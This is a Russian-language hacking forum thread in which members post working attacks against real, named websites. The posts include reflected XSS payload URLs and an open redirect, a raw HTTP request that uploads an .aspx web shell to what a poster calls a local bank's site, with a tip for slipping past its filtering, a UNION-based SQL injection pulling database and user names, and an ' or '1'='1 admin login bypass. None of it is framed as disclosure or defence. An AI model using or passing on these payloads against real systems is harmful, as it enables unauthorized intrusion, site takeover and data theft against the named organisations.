HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.11.2015, 12:54
Jup1ter_
Новичок
Регистрация: 27.11.2015
Сообщений: 19
С нами: 5506166

Репутация: 6
По умолчанию

 
Ответить с цитированием

  #2  
Старый 28.11.2015, 17:22
ubepkr
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами: 5653046

Репутация: 1
По умолчанию

Сайт: http://www.academyplazahotel.ie/

Уязвимость: Reflected XSS

Код:
http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"-->alert(1234567890)
Сайт: http://www.cleanrooms-ireland.ie

Уязвимость: Reflected XSS

Код:
http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"-->alert(1234567890)
там же: (?redirect?)

Код:
http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
Сайт: http://forums.somethingawful.com

Уязвимость: Reflected XSS

Код:
http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25alert(1234567890)
Сайт: http://www.zoommoola.com

Уязвимость: Reflected XSS

Код:
http://www.zoommoola.com/?ref='"-->alert(1234567890)
Сайт: http://www.usatestprep.com

Уязвимость: Reflected XSS

Код:
http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%alert(123456)
Сайт: http://txbra.org

Уязвимость: XSS

Код:
        
        
    
     HTMLFormElement.prototype.submit.call(document.forms[0]);
 
Ответить с цитированием

  #3  
Старый 02.12.2015, 15:15
Jup1ter_
Новичок
Регистрация: 27.11.2015
Сообщений: 19
С нами: 5506166

Репутация: 6
По умолчанию

 
Ответить с цитированием

  #4  
Старый 21.12.2015, 14:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

актуален, времени пока нет разгрести. позже всем добавлю
 
Ответить с цитированием

  #5  
Старый 31.12.2015, 20:41
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Remote Code Execution

Сайт: ecb.md

Эксплоит:

Код:
POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
SOAPAction: "http://tempuri.org/SaveDLRScript"
Content-Type: text/xml
Host: ecb.md
Content-Length: 710
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

    
        
            /..\\..\\..\\umbraco\\shell.aspx
            string
            

Код шелла .aspx,в burpsuite выбираем
Convert selection->Html->Html encode key characters
так прошел через фильтрацию

            1
Заливается тут ecb.md/umbraco/shell.aspx
 
Ответить с цитированием

  #6  
Старый 01.01.2016, 01:15
chatanti
Новичок
Регистрация: 13.07.2011
Сообщений: 29
С нами: 7807286

Репутация: 0
По умолчанию

зашел на ecb.md, стало страшно, ушел)
 
Ответить с цитированием

  #7  
Старый 01.01.2016, 01:19
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от chatanti  

зашел на ecb.md, стало страшно, ушел)
Месныи банк )
 
Ответить с цитированием

  #8  
Старый 04.01.2016, 16:00
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от AAI  

Сайт:
http://www.cobranet.org/
Уязвимость: SQL injection
Код:
http://www.cobranet.org/about.php?id=1+union+select+1,2,3,4,5,6
к сожалению дальше не раскрутил.
Вы уже всё сделали

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-[/COLOR][/COLOR] 
 
Ответить с цитированием

  #9  
Старый 04.01.2016, 19:07
AAI
Новичок
Регистрация: 27.12.2015
Сообщений: 16
С нами: 5462966

Репутация: 1
По умолчанию

Сайт: www.normatech.it/login-admin.asp

Уязвимость:SQL injection

Код:
login: ' or '1'='1
pass: ' or '1'='1
 
Ответить с цитированием

  #10  
Старый 06.01.2016, 12:12
R3hab
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами: 5785526

Репутация: 6
По умолчанию

AAI,

.SpoilerTarget" type="button">Spoiler
SQL Инъекции1

SQL Инъекции2
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...